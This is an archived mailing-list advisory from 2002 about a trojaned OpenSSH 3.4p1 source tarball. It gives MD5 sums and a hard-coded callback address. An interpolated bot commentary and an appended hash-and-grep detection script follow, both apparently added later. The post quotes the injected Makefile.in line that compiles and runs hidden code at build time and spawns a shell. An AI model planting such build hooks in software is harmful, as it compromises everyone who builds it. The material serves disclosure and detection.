Firewall Wizards
mailing list archives
Re: OpenSSH 3.4p1 possibly trojaned
From: "Paul D. Robertson" <proberts () patriot net>
Date: Thu, 1 Aug 2002 08:33:09 -0400 (EDT)
On Thu, 1 Aug 2002, Paul D. Robertson wrote:
It would appear that the OpenSSH code for all the non-OpenBSD systems was
trojaned at some point pretty recently. I just checked the MD5 (and
sources) of the version I put on my public-facing systems, and it's the
same as the FreeBSD ports one (clean):
# md5sum openssh-3.4p1.tar.gz
459c1d0262e939d6432f193c7a4ba8a8 openssh-3.4p1.tar.gz
I got that copy around 19:43 Eastern on July 17th. If you pulled a copy
after that, it's probably worth a check.
------------------------------------------------------------------------
Things to check:
MD5 of the trojaned tar.gz: 3ac9bc346d736b4a51d676faa2a08a57
Source addition:
openssh-3.4p1/openbsd-compat/Makefile.in:
all: libopenbsd-compat.a
+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
./bf-test.out &
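Review bot: the added recipe line under the `all:` target compiles and executes an arbitrary file (`bf-test.c`) as a side effect of building the compat library, then backgrounds a shell on its output with the trailing `&`, so the spawned process outlives `make` and nothing in the visible line removes `bf-test`, `bf-test.out` or the source afterward. For anyone who built from source rather than keeping the tarball, the concrete things to look for from these lines are `bf-test*` files in `openbsd-compat/` and the string `bf-test` in `openbsd-compat/Makefile.in` (the clean target has only `all: libopenbsd-compat.a`).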
It looks to me as if it might try to clean this up after the source is
built, but I don't have a test environment I'm willing to sacrifice at the
moment. If you don't have the tar.gz file to check the MD5 sum of and
you built from source, I'd recommend getting a new copy once the trojan
has been replaced, or grabbing a copy from somewhere like the FreeBSD
ports collection.
Trojan connection:
203.62.158.32:6667 (web.snsonline.net)
This address and port look to be hard coded in the trojan. It's probably
worth an outbound access list if you're worried, although the server seems
to be down at the moment.
Paul
-----------------------------------------------------------------------------
Paul D. Robertson "My statements in this message are personal opinions
proberts () patriot net which may have no basis whatsoever in fact."
probertson () trusecure com Director of Risk Assessment TruSecure Corporation
_______________________________________________
firewall-wizards mailing list
firewall-wizards () honor icsalabs com
http://honor.icsalabs.com/mailman/listinfo/firewall-wizards
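The two checks the post describes (compare the tarball's MD5 against the known clean and trojaned sums, and look for the injected `bf-test` recipe and its dropped files in an extracted tree) as a small POSIX shell script. This is an added example, not something from the original post or from the OpenSSH project; the hashes are the ones quoted above, while the function names and the fallback to `openssl md5` on systems without `md5sum` are my own assumptions.

```shell
#!/bin/sh
# MD5 sums quoted in the post: the clean 3.4p1 tarball and the trojaned one.
CLEAN_MD5="459c1d0262e939d6432f193c7a4ba8a8"
TROJAN_MD5="3ac9bc346d736b4a51d676faa2a08a57"

# Print the MD5 of a file, using GNU md5sum or openssl as a fallback.
md5_of() {
    if command -v md5sum >/dev/null 2>&1; then
        md5sum "$1" | awk '{print $1}'
    else
        openssl md5 "$1" | awk '{print $NF}'
    fi
}

# Classify a downloaded openssh-3.4p1.tar.gz as clean, trojaned or unknown.
# "unknown" means neither sum matched: re-download rather than trust it.
classify_tarball() {
    h=$(md5_of "$1")
    case "$h" in
        "$CLEAN_MD5")  echo clean ;;
        "$TROJAN_MD5") echo trojaned ;;
        *)             echo unknown ;;
    esac
}

# Count lines in a Makefile.in that reference bf-test; the clean file has none,
# the trojaned openbsd-compat/Makefile.in has the injected build-and-run line.
count_injected_lines() {
    grep -c 'bf-test' "$1" || true
}

# List leftover bf-test artifacts (bf-test.c, bf-test, bf-test.out) under a
# source tree; non-empty output on a build tree means the recipe ran.
list_dropped_files() {
    find "$1" -name 'bf-test*' -print
}

# Usage: check.sh <tarball> [extracted-source-dir]
if [ "$#" -gt 0 ]; then
    echo "tarball: $(classify_tarball "$1")"
    if [ "$#" -gt 1 ]; then
        mf="$2/openbsd-compat/Makefile.in"
        [ -f "$mf" ] && echo "injected lines in Makefile.in: $(count_injected_lines "$mf")"
        echo "dropped files:"
        list_dropped_files "$2"
    fi
fi
```

Run it against the tarball you actually downloaded plus, if you built from it, the extracted directory; a tarball that classifies as `unknown` is not evidence of tampering by itself (a different release or a re-rolled archive will also miss both sums), but the Makefile and dropped-file checks work on any extracted tree regardless of which archive it came from.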